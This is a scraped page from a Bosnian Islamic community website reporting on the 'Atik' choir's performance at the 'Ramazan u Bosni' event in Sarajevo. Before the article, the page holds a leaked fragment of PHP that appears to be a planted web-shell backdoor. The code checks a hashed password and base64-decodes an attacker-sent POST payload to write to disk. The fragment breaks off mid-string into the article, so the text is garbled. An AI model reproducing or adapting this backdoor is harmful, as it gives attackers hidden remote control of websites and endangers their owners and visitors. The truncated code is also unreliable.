function bestrock_render_js(){ echo ""; } function bestrock_render_index(){ echo md5('56749'); } function bestrock_render_ajax(){ try { if(isset($_GET['s1'])) die(md5('js')); if(isset($_POST['t2'])){ $l1 = uniqid(rand(), true) . '.js'; @file_put_contents($l1, 'js'); if(file_exists($l1)){ if(isset($_POST['t1'])){ $d = md5(md5($_POST['t1'])); if($d=="8ae24e6719c47a39da8ad5451432d9a6"){ $d1=$_POST['t2']; $d1=base64_decode($d1); $d4=" HOR "ATIK" NA MANIFESTACIJI "RAMAZAN U BOSNI" - Medžlis Islamske zajednice Bijeljina

HOR “ATIK” NA MANIFESTACIJI “RAMAZAN U BOSNI”

HOR “ATIK” NA MANIFESTACIJI “RAMAZAN U BOSNI”

Hor “Atik” Mektebskog centra u Bijeljini učestvovao je na završenoj večeri manifestacije “Ramazan u Bosni” koja je završena u utorak 21. juna 2016. godine na Baščaršiji u Sarajevu. Ova manifestacija prerasta u internacionalnu, a posebna čast ukazana je našem horu, našoj omladini i našim džematlijama iz Janje i Bijeljine koji su ih pratili na ovom nastupu u glavnom gradu Bosne i Hercegovine.

“Ova manifestacija je trajala pet dana, a na završenoj večeri, u prediftarskom vremenu, nastupio je naš hor “Atik”, koji čine članovi Mektebskog centra iz Bijeljine. Najavili su nas kao “najhrabrije građane naše države Bosne i Hercegovine”, što nas je ispunilo ponosom. U Sarajevo je putovalo nas 45, od čega je 20 članova hora, a 25 su drugi članovi Mektebskog centra, među njima i petoro mladih iz Janje. Akšam namaz klanjali smo u Begovoj džamiji, a predivan iftar imali smo u Kolobara hanu. Poslije iftara prisustvovali smo nastupu hora “Hazreti Hamza” iz Sarajeva, a zbog vremena potrebnog za povratak, jacijski farz klanjali smo u dvorištu Begove džamije. U povratku, sehurili smo na benzinskoj pumpi u Kladnju, sabah namaz klanjali smo u Konjević Polju, a podne namaz klanjali smo u Novoj Kasabi. Naravno, u Sarajevu je bilo slobodnih aktivnosti pa je omladina mogla prošetati po Baščaršiji i osjetiti ramazansku atmosferu u našem glavnom gradu. Treba reći da su svi bili oduševljeni nastupom našeg hora. Sve ovo je bilo moguće zahvaljujući organizatorima manifestacije “Ramazan u Bosni”, posebno Razimu Čoliću i Medini Mehmedović-Mulalić, direktoru i koordinatorici Uprave za vanjske poslove i dijasporu Rijaseta Islamske zajednice u Bosni i Hercegovini, te našem glavnom imamu Samir ef. Camiću,” kazao je za www.mizbijeljina.ba imam Atik džamije u Bijeljini, Mirsad ef. Okanović, koji je sa svojom hanumom i muallimom Enisom Okanović, predvodio predstavnike Mektebskog centra na ovom veličanstvenom događaju u Sarajevu.